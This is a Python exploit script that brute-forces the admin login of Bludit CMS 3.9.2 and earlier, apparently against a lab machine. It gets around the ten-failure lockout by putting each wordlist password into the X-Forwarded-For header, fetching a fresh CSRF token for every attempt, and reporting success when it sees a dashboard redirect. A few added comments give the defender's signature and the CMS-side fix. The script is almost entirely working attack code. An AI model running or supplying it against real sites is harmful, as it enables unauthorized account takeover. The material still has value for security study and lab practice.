Bludit CMS

#!/usr/bin/env python3
#---------------------
#Created by Prescott Rowe
##Bludit CMS versions 3.9.2 and prior are vulnerable to brute force, as the lockout mechanism is easily avoided. It attempts to 
##lock the user out if they fail to authenticate 10 times in a row. The code for this is held within the bl-kernel/security.class.php 
##file; there is a function named getUserIp which attempts to determine the true IP address of the end user by trusting the 
##X-Forwarded-For and Client-IP HTTP headers. By spoofing these fields every 9th or more times we can evade lockout. Spoofed 
##fields also do not need to match any regex parsing; any text will work. In fact, to stop from locking other users out it is 
##recommended to use nonsense words (like passwords) to spoof the fields.
#----------------------
import re
import requests
import sys

# Target and login parameters, exactly as found on the page.
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'admin'
wordlist = '/mylist.txt'
# NOTE(review): the wordlist handle is opened here and never closed; the script
# relies on interpreter exit to release it.
f = open(wordlist, "r")

# One login attempt per wordlist line. Every iteration opens a fresh
# requests.Session, fetches the login page for a new CSRF token, and posts
# a single username/password pair.
for password in f:
    session = requests.Session()
    login_page = session.get(login_url)
    # The form's CSRF token is scraped from the login page with a regex.
    # NOTE(review): re.search returns None when no tokenCSRF input is present
    # in the response body, so .group(1) raises AttributeError in that case.
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    # Drop the trailing newline (and any other trailing whitespace) from the wordlist line.
    password=str.rstrip(password)
    # Progress indicator; the trailing "\r" makes the next line overwrite it in place.
    sys.stdout.write("[*] Trying: "+ password + "         ")
    sys.stdout.write("\r")
    sys.stdout.flush()
#In a normal request the X-Forwarded-For header is where a proxy would pass the client IP to the CMS; after 10 failed logins that value is added to the temporary blacklist.
#Testing shows that anything can be put here and it will be logged without validity checks. In this case the password itself is used as the random unique value.
#Defender note: the observable signature is a burst of new sessions against /admin/login whose X-Forwarded-For values are not IP addresses and change on every request;
#the fix on the CMS side is to accept forwarded-IP headers only from a trusted reverse proxy, or to key the lockout on the connection's remote address instead.
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    # allow_redirects=False keeps the raw 3xx response so the Location header can be inspected below.
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A redirect to /admin/dashboard is treated as a successful login; any other response is a failure.
    # (requests' header mapping is case-insensitive, so the lowercase 'location' key matches 'Location'.)
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
